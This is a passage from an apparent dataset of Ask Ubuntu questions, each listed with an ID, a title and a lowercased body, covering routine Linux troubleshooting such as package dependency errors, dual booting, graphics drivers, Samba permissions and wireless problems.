/bluegamma=1.633485 [ dpy : vga-0 ] /dithering=0 [ dpy : vga-0 ] /ditheringmode=0 [ dpy : vga-0 ] /ditheringdepth=0 [ dpy : vga-0 ] /digitalvibrance=96 [ dpy : vga-0 ] /synchronouspaletteupdates=0 [ dpy : dvi-i-1 ] /redbrightness=0.000000 [ dpy : dvi-i-1 ] /greenbrightness=0.000000 [ dpy : dvi-i-1 ] /bluebrightness=0.000000 [ dpy : dvi-i-1 ] /redcontrast=0.000000 [ dpy : dvi-i-1 ] /greencontrast=0.000000 [ dpy : dvi-i-1 ] /bluecontrast=0.000000 [ dpy : dvi-i-1 ] /redgamma=1.000000 [ dpy : dvi-i-1 ] /greengamma=1.000000 [ dpy : dvi-i-1 ] /bluegamma=1.000000 [ dpy : dvi-i-1 ] /dithering=0 [ dpy : dvi-i-1 ] /ditheringmode=0 [ dpy : dvi-i-1 ] /ditheringdepth=0 [ dpy : dvi-i-1 ] /digitalvibrance=0 [ dpy : dvi-i-1 ] /colorspace=0 [ dpy : dvi-i-1 ] /colorrange=0 [ dpy : dvi-i-1 ] /synchronouspaletteupdates=0 [ dpy : hdmi-0 ] /dithering=0 [ dpy : hdmi-0 ] /ditheringmode=0 [ dpy : hdmi-0 ] /ditheringdepth=0 [ dpy : hdmi-0 ] /synchronouspaletteupdates=0
421473	how to upgrade from ubuntu minimal ?	i have just installed ubuntu minimal because it would fit on a cd . now , all i get is the command line . what can i do to upgrade everything so it is the full-fledged os , as if i had installed it from the normal iso file instead of minimal ?
421475	ca n't install wine - `` broken packages ''	i ca n't install wine . when i go to the terminal and type sudo apt-get install wine1.7 , i get reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.7 : depends : wine1.7-i386 ( = 1:1.7.12-0ubuntu1~saucy1 ) recommends : winbind e : unable to correct problems , you have held broken packages . i 've looked around here on askubuntu , and have n't found a solution to the problem . i tried going into synaptic and going to edit -- > fix broken packages , but this does n't fix the problem . i 've tried sudo apt-get autoremove and sudo apt-get update , but those do not solve the issue either . i 've tried adding the wine ppa , but that does n't work either . this issue started after trying to install netflix-desktop from the ppa : ehoover/compholio ppa . after i installed this , an icon appeared in my panel telling me of a problem involving wine1.7 : i386 not being in the cache . i had this problem once before , so i uninstalled wine and removed the ppa , but now wine wo n't install at all . any ideas ?
421476	wol - ubuntu 12.04 lts power computer off , computer turns back on	i have an ga-b75m-d3h gigabyte motherboard with an i3 processor that i 'm using wol from a windows machine to start the computer . the wol is working fine but the issue is when i power the computer off , whether from command line or from the gui the computer waits 6 seconds and then turns itself back on . if i let it boot up and then shut it off a second time it will stay off for good . i am wondering if there is something i need to alter in my init.d to keep this from happening or if it 's just the nature of my motherboard ? has anyone else had this issue ? i know my computer supports wol but i ca n't figure out why it keeps turning back on after powering it down . rather frustrating . any help would be great !
421478	`` ubuntu running low graphic mode '' then goes black with blue lines	my system worked fine yesterday , but when i came home today and tried to startup , my pc went to `` running low graphic mode '' and no matter what i choose from there ( start this session only in low graphic mode , and the other 3 ) it just goes to black screen with blue line . i ca n't run `` alt+ctrl+f1 '' since the screen is also blue there : / is there anything i can do ? or du i have to go through the trouble of re-installing ?
421480	nvidia tesla k10 fails to load cuda driver	i am able to download and install the video nvidia driver nvidia-linux-x86_64-331.38.run , but cudaminer still fails with `` unable to query cuda driver version ! is an nvidia driver installed ? '' if i try and install the cuda driver by its self , i fail with - > http : //bpaste.net/show/p05x0p0zanbaxupa3rml/ even sgminer is unable to see my graphics gpu : sgminer -o stratum+tcp : //mine.validerrorpool.com:3340 -u tunage -p 1 -q fatal : module nvidia_current not found . [ 17:56:49 ] error -1001 : clgetplatformsids failed ( no opencl sdk installed ? ) [ 17:56:49 ] cldevicesnum returned error , no gpus usable [ 17:56:49 ] all devices disabled , can not mine ! root @ coined : ~ # cat /proc/driver/nvidia/version nvrm version : nvidia unix x86_64 kernel module 331.38 wed jan 8 19:32:30 pst 2014 gcc version : gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) root @ coined : ~ # sgminer -o stratum+tcp : //mine.validerrorpool.com:3340 -u tunage -p 1 -q [ 18:02:55 ] error -1001 : clgetplatformsids failed ( no opencl sdk installed ? ) [ 18:02:55 ] cldevicesnum returned error , no gpus usable [ 18:02:55 ] all devices disabled , can not mine ! root @ coined : ~ # cudaminer -u tunage -p 1 -o stratum+tcp : //fast-lemon.hashrapid.com:3334 *** cudaminer for nvidia gpus by christian buchner *** this is version 2014-02-09 ( beta ) based on pooler-cpuminer 2.3.2 ( c ) 2010 jeff garzik , 2012 pooler cuda additions copyright 2013,2014 christian buchner ltc donation address : lks1wdkged647msbqflbhv3ls8svegncnm btc donation address : 16hjf5mcesojntd3ztudqdrhdypjzorakm yac donation address : y87sptdecplkleauex6qziodbvy1qxzej4 [ 2014-02-15 18:03:04 ] unable to query cuda driver version ! is an nvidia driver installed ? asus mb z87-plus with 8 gigs corsair ram . ubuntu 12.04
421483	pastebinit not working correctly	i 'm trying to use pastebinit and i ca n't figure out how to paste something to my account : cat helloworld.cpp | pastebinit -u thewalrod -p ******* -b http : //pastebin.com -t test this pastes to the site , but not with my account . nb : password omitted for obvious reasons .
421489	problem with fn button sound control ubuntu	i have a very strange problem with my audio in my ubuntu installation . first of all i have no sound , this alone is a big problem , but i use my computer mostly for work so i can keep with up for a while , now the problem is that when using the fn combination button for volume control , the volume bar change is lenght accordingly , but the icon start to blink , and then the upper bar becomes unoperative ( the icons for mail , wifi , hour , account , shut down , etc ) , after a while also the keyboard starts to fail and im forced to shutdown manually , as i said early i can work , and avoid to use that combination , but i would like to know how to repair my sound at some point . please help , if more data is required i would try to provide it to my best .
421490	fresh ubuntu install leaves connected network not working and only 2 usable usb ports	when i first did the fresh ubuntu install i noticed that only two of my usb ports on the back of my rig that line up with the ethernet port work , but no other usb port throughout the computer works ( two usb3 and four usb2 ) then i realized that i could n't connect to my wired network . it shows up but when i select it , it tells me that it has disconnected . i have found a temporary workaround for now by plugging in a wireless ethernet adapter into one of my two working usb ports . from there i tried checking for additional drivers , all that it came up with was four of the same nvidia driver but i ca n't install any of them because as i click activate it says : systemerror : e : unable to correct problems , you have held broken packages this is day four of my first step into linux , hopefully someone can help me out .
421492	what does `lsb` stands for in `lsb_release` ?	i can get ubuntu version by lsb_release -a . to remember this command i want to know what stands for the lsb ? i found `` linux standard base '' here . is this right ?
421497	issues with dependencies when installing geary	i 've just done a fresh install of ubuntu gnome 13.10 and i 'm trying to install geary after adding the yorba ppa . i 'm getting the following returned every time with sudo apt-get install geary : [ sudo ] password for tim : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : geary : depends : libwebkitgtk-3.0-0 ( < 2.1.0 ) but 2.2.1-2ubuntu1~ubuntu14.04.1~ppa0 is to be installed e : unable to correct problems , you have held broken packages . can anyone help with this ? i 've tried many , many different things based on what i 've read in different forums and nothing seems to be working . any help is appreciated . thanks .
421504	ubuntu randomly freezes during boot	i recently partitioned my hard drive to create an empty 43 gb drive on my windows 7 64-bit compaq presario . after the partition was complete , i used the windows installer from the ubuntu website ( wubi ) to install ubuntu 12.04 lts 64-bit . with my dual boot configuration complete , i restarted my computer and chose the partition with ubuntu installed on it . the first time it seemed okay until the login screen , where it froze on the login screen with a dotted purple background and a continuous animated drum sound playing . i rebooted it and the same thing kept happening . on around the fourth time , ubuntu booted correctly . then , i messed around with it for a bit when i decided i should install adobe flashplayer from the software centre . it gave me an âunmet dependenciesâ error . so i have two problems : ubuntu only boots about one out of every four times correctly i cant download certain software from the software center , as i get an error message saying the dependecies are not met .
421506	permission to write in root/usr/share/kde4/apps	i am trying to just do basic theming.. there isnt an install button for `` desktop theme '' so i am trying to copy the files to root/usr/share/kde4/apps/desktoptheme but get access denied message every time.. i tried changing permissions via properties then tried getting permissions using terminal and neither has led to any success ... it would be most helpful if someone could tell me how to get total root permissions any time that i should need them as i know that kubuntu has these files as read only to protect more inexperienced users , like myself.. but this is how i learn ... a lot of reading and trial and error ... .. any help is greatly appreciated.. thanks
421510	how do you uninstall spotify linux preview on ubuntu ?	i was on playonlinux and saw the wine version of spotify and wanted to uninstall the linux preview to get the wine version since it said not enough disk space for the installation so hopefully the uninstallation will help with trying to free space and make some room for the wine installation please give some answers quick ! : - )
421512	how to install ubuntu server without network connection ?	i have n't installed ubuntu from a disc/usb in ages . at least 2 lts versions . i have always just upgraded my server in place . i purchased new hardware that will replace that older server and instead of just moving the lvm over from the old server i 've decided to start fresh . my normal procedure for fresh server installs is : install from cd/usb without network connection log in , attach network , install some base packages that are not there by default sudo apt-get update & & sudo apt-get upgrade to kick off the massive download continue to setup server while ( 3 ) completes this normally results in about 15 minutes of me waiting for the server to install offline , followed by a much longer period where the updates download and install but at least by that point i can start using the server . with the 13.10 server image that i just pulled down via torrent i can not seem to find a way to install without a functional network connection . i 've attempted normal . minimal , and oem install modes and in each one i can not get past the network setup . when autoconfiguration fails because no network is present , i select configure network later and it still prompts me for an ubuntu mirror server . until it can connect to that server it will not progress . this disrupts my workflow and makes isolated network installs impossible . what gives ?
421516	error installing printer driver	i am trying to install the driver for my epson wp-4530 printer . i have just installed ubuntu 12.04 lts . my printer is connected to my home network router . the printer install utility is able to detect the printer and find the driver for it . it recommends to instal the epson inkjet printer driver for linux ( version 1.0.2 ) . however , when i select the driver and click the activate button i receive the following error systemerror : failed to call gpg : [ errno 2 ] no such file or directory there is no help . i do n't know what this error means and i have n't found any useful help using google searches .
421517	how can one increase the timeout before the display dims when on the battery ?	if i do not touch my computer ( a toshiba satellite ) for 15 seconds when running off the battery , the screen dims to the lowest brightness . i have already disabled `` dim screen to save power . '' i do not have this issue when my computer is connected to the charger . is there any way to fix this ? thank you for your help .
421519	recovering password and upgrading from 6.04	i have a dell mini i brought several years ago . it came with ubuntu 6.10 on it . my daughter created an administrator account on it , which she forgot the password too . is there any way by which i can reset the password or upgrade it to a recent version to make it usable ?
421523	xorg uses 100 % cpu usage after resuming from sleep	i have a toshiba satellite laptop that i purchased this december . core i5 , 4 cores , and 8 gb of ram . i recently started having problems ( within the last week or so ) with a couple of processes using an extremely large amount of my cpu percentage . xorg starts using about 100 % of one of my cores after i 've put my laptop to sleep kworker constantly uses around 50 to 80 percent of one of my cores even before logging into my account . another side effect , that i am not sure if it is related to the ones above , is my laptop 's touchscreen has stopped working . this may be helpful , so i 've included the text from the command top : tasks : 207 total , 4 running , 203 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 7.8 us , 29.6 sy , 0.0 ni , 62.7 id , 0.0 wa , 0.0 hi , 0.0 si , 0.0 st kib mem : 8087600 total , 2948744 used , 5138856 free , 144964 buffers kib swap : 9348092 total , 0 used , 9348092 free , 1228900 cached pid user pr ni virt res shr s % cpu % mem time+ command 4113 root 20 0 404m 120m 101m r 100.0 1.5 23:10.88 xorg 3353 root 20 0 0 0 0 s 48.5 0.0 19:47.33 kworker/0:0 4979 brisingr 20 0 1405m 78m 33m s 0.7 1.0 0:27.98 compiz 4750 brisingr 20 0 22304 636 424 s 0.3 0.0 0:00.40 upstart-dbus-br 4950 brisingr 20 0 778m 7632 5588 s 0.3 0.1 0:01.35 indicator-datet 6073 brisingr 20 0 1107m 193m 48m s 0.3 2.4 0:15.80 thunderbird 6320 brisingr 20 0 427m 33m 22m s 0.3 0.4 0:05.88 plugin-containe 6876 brisingr 20 0 649m 18m 12m s 0.3 0.2 0:00.57 gnome-terminal 6932 brisingr 20 0 24828 1604 1120 r 0.3 0.0 0:00.78 top 1 root 20 0 27228 2980 1420 s 0.0 0.0 0:01.50 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.03 ksoftirqd/0 5 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/0:0h 7 root rt 0 0 0 0 s 0.0 0.0 0:00.04 migration/0 8 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcu_bh 9 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/0 10 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/1 thank you in advance ! i hope i can get this fixed soon as it is impacting my laptop 's battery life ! -rj
421528	audio and video players are not working	04.2. i want to install vlc and other media players . i tried through ubuntu soft center but it shows error message like '' requires installation of untrusted packages . the action would require the installation of packages from not authenticated sources. '' . even i tried movie player but it shows the same for requirements updates when updating . please help me . please suggest a way to work in it .
421531	permissions not work samba4	first time writing but i 'm desperate and i think you can help me ... my english is very bad i speak spanish ... i install samba4 on ubuntu 12 and all is well , i can join computers to the domain and can create users . my problem is the permissions , not how they work ! i need the owner capeta have all permissions and other users can see the contents of the folder and read but not modify or delete ... i can not get that .. try all combinations of permissions on linux and does not work .. also try changing the permissions on the security tab in the administrator users and groups windows and does not work .. how can i get the owner has full control and others only see the content without removing or changing ? thanks for taking the time to help me ...
421541	error apt-get install apache 2	i need to install apache 2 in order to installe nagios xi but when i run the command apt-get install apache 2 it shows an error saying unable to locate apache 2 i use ubuntu 13.10 and i already used apt-get update and upgrade but still unable to locate apache 2 . what can i do ?
421543	all toolbars/menus are missing in openoffice	i just uninstalled libreoffice on ubuntu 12.04 and installed openoffice . after installation i ran sudo apt-get autoremove and openoffice is screwed . even a reinstall wont fix the problem . the problem is that all words from all toolbars/menus are gone/missing . how do i fix that ?
421548	ca n't log into ubuntu 13.10 with correct password	i updated available packages just after the installation at first time in ubuntu 13.10.after the installations i restarted to finish the installations.the thing is , in the log in screen i put my correct password and then it goes back to the log in screen . i 've tried so many times , but still the same.i ca n't log even as a guest user also i followed some instructions to this that i found from some forums . method 1 press ctrl+alt+f1 and log in there and run : sudo chown -r $ user : $ user $ home then press ctrl+alt+f7 and try to log in this did n't work for me method 2 login as root ( alt + ctrl + f1 to get tty1 ) chown youruser : youruser /home/youruser/.iceauthority make your youruse has full rights to the home directory chown -r youruser : youruser /home/youruser this is also not worked to me note : i had removed mozilla thunderbird before getting updates from repositories ( but i do n't think that the root cause is there ) please help me . thanks .
421549	dual boot windows 8.1 + ubuntu	i have been using my computer with windows 8.1 for about 2 months . now i decided to install ubuntu 13.10 alongside windows , basically to dual boot . i got myself out of windows , and booted from my little pendrive , where i had gparted and i shrank the windows partition . i made it 100 gb smaller to make room for my ubuntu partition . i made a new partition for ubuntu with ext4 filesystem . i also made a little 1gb partition for swap . so now i basically have like : sda1 is windows reserved sda2 is windows sda3 is ubuntu sda4 is a logical partition ( or extended ? hm , anyway : ) sda5 is my swap . it is all very nice and ok until this point . when i rebooted , i was not prompted with system selection . instead , my computer booted straight into windows . i made a little research , and found easybcd to dual boot . i added an entry for ubuntu on sda3 with grub2 , and tried to boot again . now i got a prompt , but when i chose ubuntu , it gave me error that is could n't find `` autoneogrub2.mbr '' or something like that . so i continued searching forums , and decided to install grub manually . so i booted my ubuntu livecd , and installed grub in terminal using mount /dev/sda3 /mnt grub-install -- boot-directory=/mnt /dev/sda after that , i rebooted , and got a grub screen . but it was n't a menu , just a command prompt , and i did not know how to manually boot with it , perhaps i could n't do it anyway . at that moment i was desperate , because i could n't get either to my windows , nor my ubuntu . i tried many things with my windows install disk 's recovery cmd , and finally got my mbr and bootloader back , and now i could get into windows as i am writing this . but still can not get into ubuntu , and i do n't understand what is the problem . another thing , now for some reaseon system reserved partition shows up in explorer , what causes that ? : o so that is basically it , could anybody help me get into ubuntu ? thanks in advance !
421550	how to transfer and install a software from one system to another ?	i have already installed vlc in my ubuntu 12.10 and i wish to transfer it to my friend who has no internet connection.so please help me out .
421551	unable to get flash player debugger to work in ubuntu 12.10	i have tried installing flash player debugger for linux and copied the files as mentioned in readme file . but still not able to get debug option when right click on flash content . any help would be appreciated . regards , santosh
421556	how to edit description of a software using quickly ?	by default descriptions of all new quickly apps are `` unknown '' in the debian/control file . changing that and releasing a new version does not work ( it gets reverted ) . how to edit the descriptions ?
421564	switching from ubuntu to kubuntu	i would just like to know how to switch from ubuntu to kubuntu . i 'm not really comfortable with the top bar and side bar . i would like it to be like windows 7 .
421565	how to combine two gnome panels into one	i have gnome with two panels : - top panel with menus ( launcher ) ; - bottom panel with taskbar . how can i combine this two panels into one ?
421566	time applet mising	on a randomly basis , the time applet on the unity top bar is missing . the time & date options on the system parameters are also greyed . if a restart session , time applet shows . ubuntu 13.10 . how can i solve that ?
421567	ubuntu not installing on my hp laptop	i have an hp pavilion entertainment pc and i have booting 12.04 on a dvd and when i start my computer , only loading screen shows up and it loads but nothing happens . the same problem happens with 13.10 . how can i fix this ?
421568	installing kernel 3.13 on ubuntu 13.10 fails	i am trying to install any form of the 3.13 kernel on ubuntu 13.10 however , i am unable to boot into the desktop with it . i have tried to install 3.13.1,2,3 . unfortunately to no avail . on the internet i did not find anything specific other than normal install procedure . could you please tell me if there is any other step i am missing ?
421574	can i update from 13.10 to 14.04 safely ?	i am trying to get 14.04 on my system . i am currently on 13.10 . is it possible to upgrade to it safely ? i have previously attempted an upgrade from 12.04 lts to 14.04 but it completely failed . i had to reinstall the whole thing . what is the amount of information that i will lose in this process ? has anyone else had any success in performing this upgrade ?
421575	how to recover lost partitions	i was trying to run the windows diagnostic that ships with sony laptops when it `` froze '' and i 've lost my linux 12.04 partition . i had vm 's and software configured that i ca n't afford to lose . please help me return to the state where i was before i tried running that windows tool . i am running a lunux 13.10 livecd . when i run the command : sudo gpart /dev/hda , i get the following output : *** fatal error : open ( /dev/hda ) : no such file or directory . however , when i run the command sudo fdisk -l , i get the following output : disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2d85c4ea device boot start end blocks id system /dev/sda1 2048 28887039 14442496 27 hidden ntfs winre /dev/sda2 28887040 29091839 102400 7 hpfs/ntfs/exfat /dev/sda3 29091840 1250260991 610584576 7 hpfs/ntfs/exfat ubuntu @ ubuntu : ~ $ gpart /dev/hda how should i proceed ?
421578	wireless - just working for some networks	i am running a laptop with ubuntu 12.04 installed ( running fine ) . i have a strange issue : the wireless networking does not work in certain networks and i have absolutely no idea where start searching for the error . for instance : my home network , a quite new `` fritzbox '' populates a network on channel 13 , 802.11n+g+b , wpa + wpa2 , with an ssid containing lowercase characters only ( no whitespace , dashes , numbers , [ a-z ] + in regex ) . it is not possible to find that network in the list of available networks and trying to connect to a hidden network leads to the problem that the network security key is prompted over and over again . for some reason , in some networks which are found in the list , the key is prompted over and over again and no connection is established after entering the right key ( double checked ten times ) . the strange thing about that is , that this occurs only in some networks , so for instance , at my office and a number of other networks it works just fine . where could i find some error messages ? how should i start to fix that ?
421579	i had ubuntu before	when i brought my laptop it had an ubuntu . then my friend suggested me to format it to windows . now i want to return ubuntu to my laptop . so , i have a question : can i return it back or not . and if not then download it ?
421583	how do i get a c++ compiler for my ubuntu 13.10 32 bit	i need a c++ compiler for ubuntu 13.10 ( 32 bit ) . now i have only gcc , is that possible to compile c++ programs with it ? if not , please tell where do i get a c++ compiler .
421585	how can i prevent auto-mounting of a partition in fstab ?	previously , i prevented auto-mounting of a particular partition at boot by the following line in /etc/fstab uuid= < alphanumeric > /media/windowshdd ntfs user , noauto 0 0 at some point in the last year , this failed , and the partition was automatically mounted on boot . i attempted the following , which also failed . /dev/sda1 /media/windowshdd ntfs user , noauto 0 0 thinking that perhaps i was bitten by this bug , i removed user , but that also failed . uuid= < alphanumeric > /media/windowshdd ntfs noauto 0 0 is there a way to prevent auto-mounting in fstab ?
421587	install specific application from edubuntu installer disc to ubuntu/debian ?	i 've been using ubuntu and edubuntu for sometime and found there are few packages that have additional options when on edubuntu , for example , kolourpaint on edubuntu gives good collection of fonts when compared to that on edubuntu . i believe its the customized kolourpaint package on edubuntu that bundles up additional fonts along with it . is there a way , to install the specific program from the edubuntu installer disc on to ubuntu / debian so that the customized application can be used on other distro as well ! the main reason to do is , i am also using debian and would like to make the apps work on debian too ! any help in the right direction will be much appreciated ! i 'm using edubuntu 13.10
421588	unable to unminimize nautilus	for some time i was using gnome shell and today i decided to give unity a second chance . then i noticed some problems , when i minimize nautilus i ca n't unminimize it by clicking on nautilus icon , instead , another nautilus window appear . while those two windows are opened and minimized , when i click on nautilus icon then i got spread effect ( as expected ) , but when there is only one nautilus window minimized then i ca n't unminimize it . is there any fix for this ? edit : this question is not duplicate because i do n't want to minimize on click , i want to unminimize on click , which is standard behaviour in unity , and it 's not working for me
421589	square boxes on window dialogues	i have this annoying issue with ubuntu that suddenly popped up , i 'm getting square boxes as my font on the authentication dialogue box and i have no idea why this has happened . how can i fix this ? i recently did a restore of system files because i was having issues with unity , pam authentication , ecryptfs stuff . i do n't remember having any special fonts installed for window dialogues , afaik i was using default fonts , so i should n't be getting any square boxs showing up .
421593	put ubuntu pc to standby after x minutes	we 've been using sleepd with ubuntu 12.04 to put public desktops to suspend after 5-10 minutes of inactivity . we are planning to deploy 13.10 ( later move to 14.04 ) , and have found out that sleepd package is missing . is there any other tool or a system wide setting to do this job ? how other system administrators solve this problem ? edit : in our dormitory we have 90+ students . some have regular user access and some use only the guest account . the solution must work when there are n't any users logged in .
421595	wifi dropped in ubuntu 12.04	i just installed ubuntu 12.04 on my new lenovo laptop and my wireless connection is dropped in every 20 minutes . so i have another laptop and i have ubuntu 11.10 on it , and the wireless connection is working without problem on this comp . can somebody tell me , what i have to do . regards , kolyo
421596	kde ignores window-specific rules for libreoffice	i set a rule for libreoffice writer to force its windows to ( virtual ) desktop 2 in kde plasma . but kde forgets to move its windows to desktop 2 , the rule is applied only one time once it is set . then it seems kde does not check windows to execute the rule . no such problen with any other application ( just libreoffice applications ) .
421599	how to find the cuda path ?	i try to install a program , and i can not install it because of this question it asks me during the installation : where is the cuda software for nvidia gpus installed ? on our system cuda is in places like : /share/apps/cuda4.1 /share/apps/cuda5.0 the path name will have 'include ' and 'lib64 ' directories below it . typing 'which nvcc ' may help locate the right path on your machine . cuda path : i tried to find cuda path , but i could n't ... . i have hp pavillion laptop and ubuntu 10.2 . any tips how to tackle this problem ?
421603	ca n't use qwerty layout after make ibus work with dvorak layout after reboot	to keep my input method ( bogo or unikey ) of ibus working with dvorak keyboard layout after reboot , i use sudo dpkg-reconfigure keyboard-configuration to set keyboard as dvorak , and go to tab advance in ibus preferences to check use system keyboard layout . the problem is , sometimes my friends want to borrow my laptop and i can not easily switch to qwerty layout because any input method will use dvorak . the english - english ( us ) is the same as english - english ( dvorak ) one . any idea ? please help . thank you very much .
421606	how do i find the application to run a mms : wmv file in firefox ?	i am attempting to stream movie files from my bases media center . when trying to open any of the movies using ubuntu it wants me to choose an application . i ca n't seem to select vlc or movie player . it only allows me to choose obscure files within the vlc extension . i am new to ubuntu and do not know how to find the right application when asked . i 'm sure its an easy task but i ca n't seem to find the answer on any of the searches i have attempted .
421607	how to convert an audio stream 's format ?	i need to convert an audio stream 's format . for example : suppose audio stream format is 16 bit little endian , i want to convert it to 16 bit big endian . how can i do this ?
421610	failed to fetch file [ .. ] binary-i386/packagesâ error after adding and removing architecture	i am using ubuntu 13.10 . i had call sudo dpkg -- add-architecture i386 , then install some 32 bit software , but finally call sudo dpkg -- remove-architecture i386 . i got this error when i call sudo apt-get update . w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/saucy-updates/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/saucy-backports/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/saucy-security/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . i have restored the default source lists . how could i fix this problem ? thanks for any tips .
421611	sound to light with ubuntu - ( or how to use a dmx adapter to drive leds in ubuntu )	i want to use my computer to control some dmx controlled led lights . to do this , i need a software , which does beat detection and is able to drive led lights with a dmx adapter . until now , i have only found this protocoll : http : //www.opendmx.net/index.php/ola and i 've found this dmx software : http : //qlcplus.sourceforge.net/ but as far as i know , i can not do a beat detection with those . is there anybody here who can help me ? or is there an other solution ? thank you very much !
421615	virtualbox - how to route sound from ubuntu host to windows guest ?	is it possible to route my audio output from my ubuntu host to my windows 7 guest in viurtualbox ? so it appears as a line input ? i 'm thinking of connecting windows to my pulseaudio server , but as far as i know , there is no usable implementation for this . does anybody here have experience with this topic ? thank you very much !
421618	how do i set network speed and duplex during boot ?	my problem is that i have adsl box doing autonegotiation , defaulting to 100mb . however , my network cable does not seem to operate at that rate . the speed is set to 100mbps but dhcp fails . i need to be able to set the speed to 10mbps and full duplex before the computer starts connecting to the router . i have tried setting in /etc/network/interfaces the following : auto eth0 iface eth0 inet dhcp pre-up /sbin/ethtool -s eth0 speed 10 duplex full autoneg off with this the network connection is not available at all . if i drop out the iface and pre-up lines and use an old hub that operates only with 10mbps the connection is fine . how to do the setup correctly ? i have ubuntu 12.04 lts
421619	unable to install , remove , and update ubuntu 12.04 .	i 've ubuntu 12.04 lts precise pangolin on acer aspire e1-422 . anybody can help me please to solve my problem ; there are three old kernel that i can not remove , it always gives me this error when i update and install package : ( reading database ... 164740 files and directories currently installed . ) removing linux-image-3.2.0-58-lowlatency ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-58-lowlatency /boot/vmlinuz-3.2.0-58-lowlatency update-initramfs : deleting /boot/initrd.img-3.2.0-58-lowlatency run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-58-lowlatency /boot/vmlinuz-3.2.0-58-lowlatency /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : ^ : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-58-lowlatency.postrm line 328. dpkg : error processing linux-image-3.2.0-58-lowlatency ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-3.2.0-58-lowlatency e : sub-process /usr/bin/dpkg returned an error code ( 1 )
421620	how to bring back the default graphics	i just uninstalled all cairo dock related stuffs from my ubuntu 13.10 using 'purge remove ' and now my present graphics ( colors and stuff ) are way different from my default ( when i installed it ) . can someone please explain what shall i do to bring it back to default settings .
421623	unable to setup selinux	i am trying to install selinux as described in here , but when i run check-selinux-installation , i get the following message : postfix init script is syncing the chroots . udev will create node labeled not correctly how i can fix this ?
421625	what is wrong with my shell script ?	the following program is giving error on line 7 and 9 : the while loop does not seem to be working . it is a program to show all the prime and composite numbers from 3 to a desired given input . echo prograam to find all the prime numbers from 3 to given number echo enter the last number read number n= $ number i=3 m=3 while [ $ m -le $ n ] do while [ $ i -le $ m ] do m=`expr $ n % $ i` i=`expr $ i +1` if [ $ m -eq 0 ] then echo $ n is a prime number \n else echo $ n is not a prime number \n fi done m=`expr $ m +1` done
421626	dual boot ubuntu alongside windows 8	i am looking to dual boot ubuntu alongside windows 8 . while installing ubuntu from live cd , i see the whole hard disk as free space even though windows 8 is already installed and there are 3 partitions . could someone guide me on how to install ubuntu ?
421628	error while booting to live system on acer m3200	i got this screen while booting to install/try ubuntu 13.10 on an acer m3200 from usb ( any usb ) : and i get this screen when trying to install/try ubuntu 11.10 from a cd : in both cases the boot is stuck while getting to that point , why ?
421631	hp-g62 with a synps/2 synaptics touchpad	in windows 7/8/8.1 there was a program i could use to configure the different gestures on my touchpad . like a 3-finger swipe to browse horizontaly . is there any program to configure such things in ubuntu 13.10 ? i am absolutely sure my touchpad supports multi-touch
421635	samba does not show up on lan without gui login	i have been pulling my hair out on this one and would appreciate any help . i have set up a kubuntu server ( 12.04 ) with samba shares on a lan . my issue is that the shares are not accessible when i start the server up ( in both text or gui mode ) . the shared folders show up when i login in gui mode only and i can access the files . when i login in text mode - nothing happens . i checked the status of nmbd and smbd while in both modes and they are both running fine . for the shares to be usable on lan - i have to login in gui-mode and then everything works fine . does this have anything to do with konqueror as i have modified some shares with that as well as the samba gui tool . i even tried ajenti . i have a feeling that messing around with multiple tools might have something to do with this issue .
421636	install nvidia 8400gs drivers	only today i installed ubuntu 12.04.4 lts version 64 bit.i have dual booted along with windows 7 , i have 320 gig hard drive , 4 gig ram & nvidia 8400gs.but in the graphic details it shows unknown . how should i go about installing the drivers ?
